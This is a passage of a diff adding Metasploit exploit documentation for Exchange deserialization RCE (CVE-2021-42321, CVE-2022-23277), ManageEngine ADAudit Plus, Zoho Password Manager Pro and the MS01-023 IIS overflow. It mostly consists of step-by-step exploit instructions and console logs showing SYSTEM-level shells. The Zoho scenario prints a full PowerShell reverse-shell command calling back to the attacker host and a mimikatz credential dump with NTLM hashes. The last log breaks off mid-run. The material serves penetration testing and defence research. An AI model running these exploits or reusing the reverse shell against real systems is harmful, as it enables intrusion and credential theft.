-                                              3 80 c3 5f 2e cd 81 93 4e 81 52 32 e2 49 8e
-                                               61 63 ac 5e 72 59 f3 40 d5 be 2a cd ba a2
-                                              e4 f7 08 a6 af 1c 10 4f 79 4c 62 60 84 ad 6
-                                              6 9f 29 ae 03 2c b0 83 44 be 4b e8 64 1d 29
-                                               9b 8f 77 2c 92 5c 80 ca 93 d6 7c fe 1f 6b
-                                              f6 48 52 22 62 14 ba ea 4b 7a 2b 69 98 60 4
-                                              6 43 8e 1f 22 87 a8 57 35 06 9e 6e 83 f1 9e
-                                               25 01 34 55 eb 93 a8 f9 65 ab 56 9e 7b b8
-                                              83 86 63 b4 e2 0a e9 a7 cb a0 34 89 35 72 a
-                                              a 3b f2 df ea c1 f6 77 a6 bb cb
-HealthMailbox25ad078  TESTINGDOMAIN.INTERNAL  (null)
-dc1$                  TESTINGDOMAIN.INTERNAL  (null)
-
-
-meterpreter >
-```
@@ -0,0 +1,317 @@
+## Vulnerable Application
+
+### Description
+This module exploits vulnerabilities within the ChainedSerializationBinder as used in Exchange Server 2019 CU10,
+Exchange Server 2019 CU11, Exchange Server 2016 CU21, and Exchange Server 2016 CU22 all prior to Mar22SU.
+
+Note that authentication is required to exploit these vulnerabilities.
+
+By leveraging this vulnerability, attackers can bypass the `ChainedSerializationBinder`'s deserialization deny list and
+execute code as `NT AUTHORITY\SYSTEM`.
+
+#### CVE-2021-42321 (Deny List Typo)
+This specific flaw exists due to the fact that the deny list for the ChainedSerializationBinder had a typo whereby an
+entry was incorrectly defined as `System.Security.ClaimsPrincipal` instead of the proper value of
+`System.Security.Claims.ClaimsPrincipal`.
+
+Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019, and Exchange Server 2016 CU22 SU0 on Windows Server
+2016.
+
+#### CVE-2022-23277 (Type Spoof Bypass)
+Due to `ChainedSerializationBinder.BindToType(string, string)` and `ObjectReader.FastBindToType(string, string)` using 
+different algorithms, it is possible to bypass validation checks and load a malicious object.
+
+Tested against Exchange Server 2019 CU11 SU3, build 15.2.986.15 via [KB5008631].
+### Setup
+
+1. Set up a version of Windows Server 2019.
+2. Download Exchange Server 2019 CU11 SU0 from https://download.microsoft.com/download/5/3/e/53e75dbd-ca33-496a-bd23-1d861feaa02a/ExchangeServer2019-x64-CU11.ISO
+3. Follow the guide at https://petri.com/how-to-install-active-directory-in-windows-server-2019-server-manager to turn
+the server into an AD server.
+4. Mount the ISO and run `Setup.exe`. It should prompt you install .NET Framework, Visual Studio C++ Redistributables,
+and Unified Communications Managed API. Install these and then reboot.
+5. Follow https://www.nucleustechnologies.com/blog/step-by-step-guide-to-install-exchange-server-2019-part-1/ and
+install the required features.
+6. Keep running `Setup.exe` and installing extra dependencies as needed as per the links.
+7. When you do get all dependencies installed, Exchange should give a button called `Install` which should no longer be
+greyed out. Press this to install and accept any warnings that appear.
+8. Go to https://*ip here*/owa/ and make sure you can see the Exchange Outlook login page.
+
+## Verification Steps
+
+1. Follow [Setup](#setup) to set up a vulnerable target.
+2. `msfconsole`
+3. `set RHOST <target IP address>`
+4. `set LHOST <IP for target to connect back to>`
+5. `set HttpUsername <username of OWA user to log in as>`
+6. `set HttpPassword <password for this OWA user>`
+7. Optional: `set DOMAIN <domain of OWA user>`
+8. Optional: `set VHOST <vhost of target>`
+9. `exploit`
+10. You should get a shell on the target as `NT AUTHORITY\SYSTEM` if it is vulnerable.
+
+## Targets
+
+### 0
+
+Windows Command
+
+### 1
+
+Windows Dropper
+
+### 2
+
+PowerShell Stager
+
+## Options
+
+### HttpUsername
+
+Set this to the OWA username. This can also be set to a valid domain username that has permissions to log into Exchange.
+
+### HttpPassword
+
+Set this to the OWA password. This can also be set to the password for a domain user that has permissions to log into Exchange.
+
+## Scenarios
+
+### Exchange Server 2016 CU22 (Build 15.1.2375.7) on Windows Server 2016 x64 (CVE-2021-42321)
+
+```
+msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce 
+[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpUsername aliddle
+HttpUsername => aliddle
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpPassword Password1
+HttpPassword => Password1
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set DOMAIN EXCHG
+DOMAIN => EXCHG
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set RHOSTS 192.168.159.42
+RHOSTS => 192.168.159.42
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options 
+
+Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  Password1        yes       The password to use to authenticate to the Exchange server
+   HttpUsername  aliddle          yes       The username to log into the Exchange server as
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.159.42   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         443              yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI     /                yes       Base path
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Command
+
+
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Target is an Exchange Server!
+[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is vulnerable to CVE-2021-42321
+[*] Getting the user's inbox folder's ID and ChangeKey ID...
+[+] ChangeKey value for Inbox folder is AQAAABYAAAD9j/m9iNuTRpA5mrD5EV0AAAAACmbL
+[+] ID value for Inbox folder is AQMkADU1ADBhYjYzMi02MTQ3LTRlOTEtYjU1ADAtN2M0ZDBhYjYzODVlAC4AAAMhko4gUQEoR6mlLklj/zwrAQD9j/m9iNuTRpA5mrD5EV0AAAMBDAAAAA==
+[*] Deleting the user configuration object associated with Inbox folder...
+[!] Was not able to successfully delete the existing user configuration on the Inbox folder!
+[!] Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!
+[*] Creating the malicious user configuration object on the Inbox folder!
+[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
+[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
+[*] Sending stage (175686 bytes) to 192.168.250.237
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:60610) at 2022-08-16 15:56:01 -0400
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-BPID95ACQ7E
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : EXCHG
+Logged On Users : 4
+Meterpreter     : x86/windows
+meterpreter >
+```
+
+### Exchange Server 2016 CU22 Jan22SU (Build 15.1.2375.18) on Windows Server 2016 x64 (CVE-2022-23277)
+
+```
+msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce 
+[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpUsername aliddle
+HttpUsername => aliddle
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpPassword Password1
+HttpPassword => Password1
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set DOMAIN EXCHG
+DOMAIN => EXCHG
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set RHOSTS 192.168.159.42
+RHOSTS => 192.168.159.42
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options 
+
+Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  Password1        yes       The password to use to authenticate to the Exchange server
+   HttpUsername  aliddle          yes       The username to log into the Exchange server as
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.159.42   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         443              yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI     /                yes       Base path
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Command
+
+
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Target is an Exchange Server!
+[+] The target appears to be vulnerable. Exchange Server 15.1.2375.18 is vulnerable to CVE-2022-23277
+[*] Getting the user's inbox folder's ID and ChangeKey ID...
+[+] ChangeKey value for Inbox folder is AQAAABYAAAD9j/m9iNuTRpA5mrD5EV0AAAB3/PSE
+[+] ID value for Inbox folder is AQMkADU1ADBhYjYzMi02MTQ3LTRlOTEtYjU1ADAtN2M0ZDBhYjYzODVlAC4AAAMhko4gUQEoR6mlLklj/zwrAQD9j/m9iNuTRpA5mrD5EV0AAAMBDAAAAA==
+[*] Deleting the user configuration object associated with Inbox folder...
+[+] Successfully deleted the user configuration object associated with the Inbox folder!
+[*] Creating the malicious user configuration object on the Inbox folder!
+[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
+[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
+[*] Sending stage (175686 bytes) to 192.168.250.237
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:59440) at 2022-08-16 15:47:55 -0400
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-BPID95ACQ7E
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : EXCHG
+Logged On Users : 7
+Meterpreter     : x86/windows
+meterpreter >
+```
+
+### Exchange Server 2019 CU11 Jan22SU (Build 15.2.986.15) on Windows Server 2019 x64 (CVE-2022-23277)
+
+```
+msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce 
+[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set RHOSTS 192.168.159.11
+RHOSTS => 192.168.159.11
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpUsername aliddle
+HttpUsername => aliddle
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpPassword Password1!
+HttpPassword => Password1!
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set DOMAIN MSFLAB.LOCAL
+DOMAIN => MSFLAB.LOCAL
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options 
+
+Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  Password1!       yes       The password to use to authenticate to the Exchange server
+   HttpUsername  aliddle          yes       The username to log into the Exchange server as
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.159.11   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         443              yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI     /                yes       Base path
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Command
+
+
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Target is an Exchange Server!
+[+] The target appears to be vulnerable. Exchange Server 15.2.986.15 is vulnerable to CVE-2022-23277
+[*] Getting the user's inbox folder's ID and ChangeKey ID...
+[+] ChangeKey value for Inbox folder is AQAAABYAAACLmD9luiUIToCqtjHJMHTFAAADDlsC
+[+] ID value for Inbox folder is AQMkAGMzMmEwZDQyLTJmMmYtNDdlNi04Nzg0LTNiMmNmMTkwZmNjAGIALgAAAwy2SlsLo7NNtRvmAZGoLDABAIuYP2W6JQhOgKq2MckwdMUAAAIBDAAAAA==
+[*] Deleting the user configuration object associated with Inbox folder...
+[+] Successfully deleted the user configuration object associated with the Inbox folder!
+[*] Creating the malicious user configuration object on the Inbox folder!
+[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
+[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
+[*] Sending stage (175686 bytes) to 192.168.250.237
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:63854) at 2022-08-16 15:49:45 -0400
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : EXCHANGE2019
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MSFLAB
+Logged On Users : 9
+Meterpreter     : x86/windows
+meterpreter > 
+```
+
+[KB5008631]: https://support.microsoft.com/en-gb/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-january-11-2022-kb5008631-2ee4d1f3-8341-4a4d-86be-4b73bc944f1b
@@ -0,0 +1,70 @@
+## Vulnerable Application
+
+The vulnerable application is ManageEngine ADAudit Plus prior to build 7060. I built and tested this on build 7055, which, at least at the time of this writing, you can download [here](https://archives2.manageengine.com/active-directory-audit/). It's a .exe file that you can install with all the defaults.
+
+You also need to configure ADAudit to actually audit a domain. That means setting up a domain (I created a domain controller in the lab), and configuring ADAudit to scan that domain. That domain name must be set to the `DOMAIN` when using this exploit.
+
+The last thing is, three connect-back ports must be open from the target back to Metasploit (in addition to whatever payload ports). By default, we use ports 8080 and 8888 for HTTP, and 2121 for FTP.
+
+## Verification Steps
+
+1. Install the application
+2. Do: `set RHOSTS <IP>`
+3. Do: `set DOMAIN <DOMAIN_NAME>`
+4. Do: `exploit`
+5. You should get a meterpreter session
+
+## Scenarios
+
+```
+msf6 > use exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
+[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
+msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > set RHOSTS 10.0.0.148
+RHOSTS => 10.0.0.148
+msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > set DOMAIN ad.example.local
+DOMAIN => ad.example.local
+msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. The vulnerable endpoint responds with HTTP/200.
+[*] Attempting to exploit XXE to get a list of users
+[*] Using URL: http://10.0.0.146:8080/KEmvnPFxS.dtd
+[*] User accounts discovered: Ron
+[*] Enumerating old payloads cached on the server (to skip later)
+[*] Using URL: http://10.0.0.146:8080/NvkXTJXRyhV.dtd
+[*] Attempting to exploit XXE to store our serialized payload on the server
+[*] Trying to find our payload in all users' temp folders
+[*] Using URL: http://10.0.0.146:8080/ppVHiihu.dtd
+[*] Executing payload: /users/Ron/appdata/local/temp/jar_cache4413164256015023251.tmp...
+[*] Sending stage (175686 bytes) to 10.0.0.148
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.148:52347) at 2022-07-07 15:19:59 -0700
+
+meterpreter >
+```
+
+## Options
+
+### TARGETURI_DESERIALIZATION / TARGETURI_XXE
+
+The target URLs - probably won't ever need to be changed
+
+### DOMAIN
+
+A domain that the target monitors. We cannot validate this, but if the exploit should work and doesn't, this might be the issue.
+
+### SRVPORT / SRVPORT_FTP / SRVPORT_HTTP2
+
+The connect-back ports.
+
+* `SRVPORT` is used to host XXE payloads
+* `SRVPORT_HTTP2` is used for an XXE payload that is held open, creating a temporary file on the server
+* `SRVPORT_FTP` is used for a fake off-spec FTP server that receives a directory listing also via XXE
+
+# PATH_TRAVERSAL_DEPTH
+
+The number of `../` to add to the request
+
+# FtpCallbackTimeout / HttpUploadTimeout
+
+How long to wait for FTP or HTTP responses before giving up
@@ -0,0 +1,185 @@
+## Vulnerable Application
+This module exploits a unauthenticated deserialization vulnerability in the XML RPC interface exposed by Zoho
+ManageEngine Password Manager Pro before 12101 and PAM360 before 5510. Note that ManageEngine Access Manager Plus
+before 4303 is also affected provided one provides credentials, however this is not targeted by this exploit.
+
+Successful exploitation results in unauthenticated RCE as the `NT AUTHORITY\SYSTEM` user.
+
+### Installation
+Vulnerable software for testing can be downloaded [here](https://archives2.manageengine.com/passwordmanagerpro/12100/ManageEngine_PMP_64bit.exe).
+The patch can be downloaded from [here](https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm)
+
+When installing the software follow the defaults. You can skip the registration however or any parts where you need
+to fill in additional details to continue (these should have a `Skip` button so you can skip them).
+
+## Verification Steps
+1. Follow the installation instructions above.
+2. Start msfconsole
+3. Do: `use exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce`
+4. Do: `set RHOSTS [IP]`
+7. Do: `set payload [payload]`
+8. Do: `set LHOST [IP]`
+9. Optional: `set LPORT [local port to listen on]`
+10. Do: `exploit`
+
+## Options
+
+## Targets
+```
+Id  Name
+--  ----
+0   Windows EXE Dropper
+1   Windows Command
+2   Windows Powershell
+```
+
+## Scenarios
+### ManageEngine Password Manager Pro 12100 Running on Windows 11
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce
+[*] Using configured payload cmd/windows/reverse_powershell
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > set RHOSTS 172.17.245.94
+RHOSTS => 172.17.245.94
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > set LHOST 172.17.255.112 
+LHOST => 172.17.255.112
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > set LPORT 8899
+LPORT => 8899
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > show options
+
+Module options (exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.17.245.94    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metas
+                                         ploit
+   RPORT      7272             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local
+                                         machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/windows/reverse_powershell):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.17.255.112   yes       The listen address (an interface may be specified)
+   LPORT  8899             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows Command
+
+
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > exploit
+
+[*] Started reverse TCP handler on 172.17.255.112:8899 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Target can deserialize arbitrary data.
+[*] Executing Windows Command for cmd/windows/reverse_powershell
+[+] Successfully executed command: powershell -w hidden -nop -c $a='172.17.255.112';$b=8899;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) {    start-sleep -m 100;    if ($osread.IsCompleted -and $osread.Result -ne 0) {      $r=$os.BaseStream.EndRead($osread);      $s.Write($ob,0,$r);      $s.Flush();      $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);    }    if ($esread.IsCompleted -and $esread.Result -ne 0) {      $r=$es.BaseStream.EndRead($esread);      $s.Write($eb,0,$r);      $s.Flush();      $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);    }    if ($s.DataAvailable) {      $r=$s.Read($nb,0,$nb.Length);      if ($r -lt 1) {          break;      } else {          $str=$e.GetString($nb,0,$r);          $is.write($str);      }    }    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {        break;    }    if ($p.ExitCode -ne $null) {        break;    }}
+[*] Command shell session 1 opened (172.17.255.112:8899 -> 172.17.245.94:56612) at 2022-08-02 11:37:28 -0500
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.22000.795]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\Program Files\ManageEngine\PMP\bin>
+-----
+          
+
+C:\Program Files\ManageEngine\PMP\bin>whoami
+whoami
+nt authority\system
+
+C:\Program Files\ManageEngine\PMP\bin>background
+
+Background session 1? [y/N]  y   
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type               Information                                      Connection
+  --  ----  ----               -----------                                      ----------
+  1         shell cmd/windows  Shell Banner: Microsoft Windows [Version 10.0.2  172.17.255.112:8899 -> 172.17.245.94:56612 (172.
+                               2000.795] (c) Microsoft Corpo...                 17.245.94)
+
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions -u 1
+[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
+
+[*] Upgrading session ID: 1
+[*] Starting exploit/multi/handler
+[*] Started reverse TCP handler on 172.17.255.112:4433 
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > 
+[*] Sending stage (200774 bytes) to 172.17.245.94
+[*] Meterpreter session 2 opened (172.17.255.112:4433 -> 172.17.245.94:56631) at 2022-08-02 11:38:11 -0500
+[*] Stopping exploit/multi/handler
+
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                   Connection
+  --  ----  ----                     -----------                                   ----------
+  1         shell cmd/windows        Shell Banner: Microsoft Windows [Version 10.  172.17.255.112:8899 -> 172.17.245.94:56612 (1
+                                     0.22000.795] (c) Microsoft Corpo...           72.17.245.94)
+  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN11-TEST              172.17.255.112:4433 -> 172.17.245.94:56631 (1
+                                                                                   72.17.245.94)
+
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > load kiwi
+Loading extension kiwi...
+  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
+ .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
+ ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
+ ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
+ '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
+  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
+
+Success.
+meterpreter > creds_all
+[+] Running as SYSTEM
+[*] Retrieving all credentials
+msv credentials
+===============
+
+Username  Domain      NTLM                              SHA1
+--------  ------      ----                              ----
+admin     WIN11-TEST  209c6174da490caeb422f3fa5a7ae634  7c87541fd3f3ef5016e12d411900c87a6046a8e8
+
+wdigest credentials
+===================
+
+Username     Domain      Password
+--------     ------      --------
+(null)       (null)      (null)
+WIN11-TEST$  WORKGROUP   (null)
+admin        WIN11-TEST  (null)
+
+kerberos credentials
+====================
+
+Username     Domain      Password
+--------     ------      --------
+(null)       (null)      (null)
+admin        WIN11-TEST  (null)
+win11-test$  WORKGROUP   (null)
+
+
+meterpreter > 
+```
@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+This exploits a buffer overflow in the request processor of the
+Internet Printing Protocol ISAPI module in IIS. This module
+works against Windows 2000 Server and Professional SP0-SP1.
+
+If the service stops responding after a successful compromise,
+run the exploit a couple more times to completely kill the
+hung process.
+
+This module has been tested successfully on:
+
+* Windows 2000 Professional SP0 (Dutch)
+* Windows 2000 Professional SP0 (Finnish)
+* Windows 2000 Professional SP0 (Greek)
+* Windows 2000 Professional SP0 (Korean)
+* Windows 2000 Professional SP0 (Turkish)
+* Windows 2000 Professional SP1 (Arabic)
+* Windows 2000 Professional SP1 (Czech)
+* Windows 2000 Professional SP1 (English)
+* Windows 2000 Professional SP1 (Greek)
+* Windows 2000 Server SP0 (Chinese)
+* Windows 2000 Server SP0 (Dutch)
+* Windows 2000 Server SP0 (English)
+* Windows 2000 Server SP0 (German)
+* Windows 2000 Server SP0 (Hungarian)
+* Windows 2000 Server SP0 (Italian)
+* Windows 2000 Server SP0 (Portuguese)
+* Windows 2000 Server SP0 (Spanish)
+* Windows 2000 Server SP0 (Turkish)
+* Windows 2000 Server SP1 (English)
+* Windows 2000 Server SP1 (French)
+* Windows 2000 Server SP1 (Swedish)
+
+## Verification Steps
+
+1. `use exploit/windows/iis/ms01_023_printer`
+1. `set RHOSTS [IP]`
+1. `show targets` to see the possible targets
+1. `set TARGET [TARGET]`
+1. `set PAYLOAD windows/shell/reverse_tcp`
+1. `set LHOST [IP]`
+1. `run`
+
+## Options
+
+
+## Scenarios
+
+### Windows 2000 Professional SP1 (EN)
+
+```
+msf6 > use exploit/windows/iis/ms01_023_printer
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/iis/ms01_023_printer) > set rhosts 192.168.200.195
+rhosts => 192.168.200.195
+msf6 exploit(windows/iis/ms01_023_printer) > check
+[*] 192.168.200.195:80 - The target appears to be vulnerable.
+msf6 exploit(windows/iis/ms01_023_printer) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Windows 2000 SP0-SP1 (Arabic)
+   1   Windows 2000 SP0-SP1 (Czech)
+   2   Windows 2000 SP0-SP1 (Chinese)
+   3   Windows 2000 SP0-SP1 (Dutch)
+   4   Windows 2000 SP0-SP1 (English)
+   5   Windows 2000 SP0-SP1 (French)
+   6   Windows 2000 SP0-SP1 (Finnish)
+   7   Windows 2000 SP0-SP1 (German)
+   8   Windows 2000 SP0-SP1 (Korean)
+   9   Windows 2000 SP0-SP1 (Hungarian)
+   10  Windows 2000 SP0-SP1 (Italian)
+   11  Windows 2000 SP0-SP1 (Portuguese)
+   12  Windows 2000 SP0-SP1 (Spanish)
+   13  Windows 2000 SP0-SP1 (Swedish)
+   14  Windows 2000 SP0-SP1 (Turkish)
+   15  Windows 2000 Pro SP0 (Greek)
+   16  Windows 2000 Pro SP1 (Greek)
+
+
+msf6 exploit(windows/iis/ms01_023_printer) > set target 4
+target => 4
+msf6 exploit(windows/iis/ms01_023_printer) > set payload windows/shell/reverse_tcp
+payload => windows/shell/reverse_tcp
+msf6 exploit(windows/iis/ms01_023_printer) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf6 exploit(windows/iis/ms01_023_printer) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444
+[*] Using target: Windows 2000 SP0-SP1 (English) ...
